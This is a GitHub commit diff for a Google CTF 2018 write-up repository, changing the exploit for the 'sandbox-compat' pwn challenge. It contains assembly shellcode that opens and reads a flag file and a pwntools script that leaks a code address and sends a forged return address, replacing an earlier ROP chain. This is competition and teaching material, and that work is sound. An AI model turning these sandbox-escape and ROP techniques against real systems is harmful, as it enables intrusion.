File tree Expand file tree Collapse file tree 2 files changed +10
-23
lines changed
google-ctf-quals-2018/sandbox-compat Expand file tree Collapse file tree 2 files changed +10
-23
lines changed Original file line number Diff line number Diff line change 7777* better_zip (crypto 231pts)
7878* keygenme (rev 249pts)
7979* sandbox-compat (pwn 420pts)
80+ - [ writeup] ( https://david942j.blogspot.com/2018/06/write-up-google-ctf-2018-pwn420-sandbox.html )
8081* sftp (pwn 181pts)
8182
8283## hitcon-quals-2017
Original file line number Diff line number Diff line change 4040
4141 mov esi, 0
4242 mov edx, esp
43- mov ecx, 0x100
44- call read /* read rop */
43+ mov ecx, 0x10
44+ call read /* read return address */
4545
46- mov esi, esp
47- call open
48-
49- std /* Hoo ray! */
46+ std /* Yoooooo! */
5047 mov esi, esp
5148 add esi, 8
5249 call open
5350
54- mov esi, 4
51+ mov esi, eax /* open("flag")'s fd */
5552 mov edx, esp
5653 mov ecx, 0x100
5754 call read
9390r .recvuntil ('code!\n ' )
9491r .send (payload + 'deadbeef' )
9592r .recvuntil ("[*] let's go...\n " )
96- elf = ELF ('sandbox' )
97- elf .address = u64 (unhex (r .recvn (12 ))[::- 1 ] + '\0 \0 ' )
98- log .info ('text base: ' + hex (elf .address ))
99-
100- ret = elf .address + 0xbf6
101- flag = elf .address + 0x1914
102- xor_eax = elf .address + 0x1430
103- pop_rdi = elf .address + 0x17dd
104- pop_rsi_15 = elf .address + 0x17db
105- pop_rbx = elf .address + 0x1402
93+ text_base = u64 (unhex (r .recvn (12 ))[::- 1 ] + '\0 \0 ' )
94+ log .info ('text base: ' + hex (text_base ))
10695# raw_input()
96+ log .info ("Sending forged address.." )
10797r .send (flat (
108- ret , ret , ret , # whatever
109- pop_rdi , 2 , # open
110- pop_rsi_15 , flag , 0 ,
111- elf .plt ['syscall' ],
112- pop_rbx , 0x00000000beeffdec , # resume stack
113- 0x10000002c ,
98+ text_base + 0x13d7 ,
99+ "flag" .ljust (8 , '\x00 ' ),
114100))
115101
116102r .interactive ()
You can’t perform that action at this time.
0 commit comments